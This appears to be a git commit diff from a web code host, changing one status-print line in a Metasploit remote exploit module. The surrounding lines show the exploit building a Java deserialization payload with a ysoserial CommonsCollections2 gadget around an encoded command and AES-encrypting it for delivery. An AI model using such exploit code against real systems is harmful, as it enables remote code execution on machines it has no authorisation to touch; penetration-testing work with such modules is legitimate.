fixed
This commit is contained in:
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
def exploit
|
||||
cmd = payload.encoded
|
||||
vprint_status(cmd)
|
||||
vprint_status("Execute CMD: #{cmd}")
|
||||
type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' )
|
||||
java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type)
|
||||
ciphertext = aes_encrypt(java_payload)
|
||||
|
||||
Reference in New Issue
Block a user